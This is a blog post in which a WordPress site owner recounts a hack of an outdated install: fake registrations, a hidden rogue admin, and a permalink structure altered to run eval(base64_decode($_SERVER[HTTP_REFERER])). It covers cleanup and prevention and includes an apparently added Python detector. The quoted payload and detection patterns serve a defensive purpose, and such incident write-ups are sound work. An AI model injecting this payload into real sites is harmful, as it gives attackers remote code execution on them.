During the past few days there have been quite a few hacker attacks on WordPress powered blogs.
One of my blogs was targeted and successfully hacked.
Prior to the hack occurring I noticed a few new accounts had been created by people with strange names using Gmail addresses. This made me a little suspicious, as the blogs do not actively encourage registrations. As a result of this I wrote this draft:
Over the past few days a number of new registrations have occurred on two of my blogs. The number hasn’t been great, maybe two a day on each blog.
You may think this is a good thing as it helps build community and shows people are interested in learning more about the blog, and this would be true if the blogs were encouraging people to become members, but they are not.
Both of the blogs concerned have been created using WordPress, and even though the registration page is not linked to from the blog, it is not difficult to guess where it is located for most WordPress installations (http://www.mydomain.com/wp-registration.php). What makes the activity of registering even more suspicious is the use of names and email addresses that make no sense and the use of Gmail in each case.
Whenever I am unsure about something I always turn to Google to see what it has to say. I did this for each of the email addresses used in the registrations. Here are some of those email addresses and a link to Google’s search results:
alexsannd@mail.ru (Google search results)
k.ergearo.rearf@gmail.com (Google search results)
pulvillarrac@gmail.com (Google search results)
obierebelominepyb@gmail.com (Google did not return any results for this address)
bugbeemershonyhe@gmail.com (Google search results)
If you have looked at some of the search results you have probably come to the same SPAMMER/HACKER conclusion as me. If the people who have registered are legitimate, I apologize, but I sincerely doubt they are people genuinely interested in getting involved with the development of my blogs. I think they are people looking for a way into the backend of my blogs in order to cause some damage.
So what can be done to stop this happening?
Firstly, if you run your WordPress blog on your own and you are happy to continue doing so, you must switch off the ‘Anyone can register’ feature. It is off by default, but it may have been enabled at some point and never disabled.
If you do allow people to register you can set the default role to ‘Subscriber’ until the registration has been verified. Once you have checked the registration you can upgrade the user’s role to Contributor, Author or whatever you choose.
You could install your WordPress core files in a different directory. I am not convinced this would be that successful in stopping fake registrations, but it is worth considering.
Add the Audit Trail plugin so you can see what is happening on your blog.
That was as far as I got. When I logged on the next day I noticed Photobomb had been hacked. A new admin user had been created (only visible through phpMyAdmin and not the WordPress dashboard) and the permalink structure had been changed to include this:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
A search on Google returned several results, including this thread on the WordPress forums; it was clear some muppet had hacked into the site and taken advantage of my lackadaisical approach to updating the core files to 2.8.4 – and the attack seemed to be quite widespread.
The fix was easy – upgrade to 2.8.4 (after first backing up the database and downloading the whole site), change the permalink structure back to its original state (which, incidentally, had been changed from the default setting of ‘year/month/post-title’ to ‘year/month/DAY/post-title’) and log in to the MySQL database and delete the newly created admin user. As far as I could tell this fixed the hack.
I can’t be sure the new registrations and subsequent attack were linked, but it seems too much of a coincidence for them not to be. The admin user was created with the username FrankGunning77, but I didn’t make a note of the email address. There are a lot of people called Frank Gunning, but I doubt the real Frank Gunning is the man behind the hack attack.
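The two indicators described above (PHP injected into the permalink structure, and an administrator account that only shows up in the database) can be checked against a database export without relying on the dashboard. The following is an added example, not code from the original post; it runs on constructed rows shaped like the wp_options, wp_users and wp_usermeta tables, and the only page-specific values it reuses are the permalink fragment and the FrankGunning77 username quoted above.

```python
import re

# PHP fragments that have no business inside a permalink structure.
INJECTED_PHP = re.compile(r"eval\s*\(|base64_decode\s*\(|\$_SERVER|\$_(?:GET|POST|COOKIE|REQUEST)")
# A legitimate structure is nothing but %tags% and static path segments.
CLEAN_STRUCTURE = re.compile(r"(?:/?%[a-z_]+%|/[A-Za-z0-9._-]+)*/?")


def permalink_is_suspicious(structure: str) -> bool:
    """True if the permalink_structure option holds anything but tags and paths."""
    return CLEAN_STRUCTURE.fullmatch(structure) is None or bool(INJECTED_PHP.search(structure))


def unexpected_admins(users, usermeta, known_admins):
    """Return logins holding the administrator capability that are not in known_admins.

    wp_usermeta stores roles as a PHP-serialized array such as
    a:1:{s:13:"administrator";b:1;}, so a substring test is sufficient here.
    """
    logins = {u["ID"]: u["user_login"] for u in users}
    admins = {
        m["user_id"]
        for m in usermeta
        if m["meta_key"].endswith("_capabilities") and '"administrator"' in m["meta_value"]
    }
    return sorted(logins[uid] for uid in admins if logins.get(uid) not in known_admins)


# Constructed sample rows: one legitimate admin plus the rogue account from the post,
# and the tampered permalink structure the post quotes.
SAMPLE_OPTIONS = {
    "permalink_structure": "/%year%/%monthnum%/%postname%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
}
SAMPLE_USERS = [
    {"ID": 1, "user_login": "siteowner"},
    {"ID": 7, "user_login": "FrankGunning77"},
]
SAMPLE_USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 7, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
]

if __name__ == "__main__":
    print("permalink suspicious:", permalink_is_suspicious(SAMPLE_OPTIONS["permalink_structure"]))
    print("unexpected admins:", unexpected_admins(SAMPLE_USERS, SAMPLE_USERMETA, {"siteowner"}))
```

Against a live site the same two checks are a SELECT on wp_options for option_name = 'permalink_structure' and a join of wp_users to wp_usermeta on the capabilities key; the table prefix varies per install.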
Today, on a dormant blog running an old version of WordPress, another user has been created, this time with the email address ulrichedmondsuses@gmail.com and username UlricheDmond. This is obviously fake and the user has been deleted and the blog updated.
So, if you are running a WordPress blog and the version is not 2.8.4 you really should update it if you want to reduce the risk of it being hacked. It seems the prowlers have not stopped and are still looking for lazy bloggers to exploit.
Further reading on this hack and WordPress security issues:
Lorelle – Old WordPress Versions Under Attack
WordPress Spam Hack Alert
WordPress forum thread – eval(base64_decode(…)) in permalinks
WordPress Hacked – eval base64_decode _SERVER[HTTP_REFERER]
WordPress Security Tips and Hacks
UPDATE
After this post was published I had a quick search for a plugin which stops registrations from the generic email addresses most often used by spammers and hackers – Gmail, Hotmail etc. I found one called No Disposable Email. It is working with WordPress 2.8.4 and has an editable list of domains you don’t want users to register with. Gmail is not in the default list, but it is easy to add.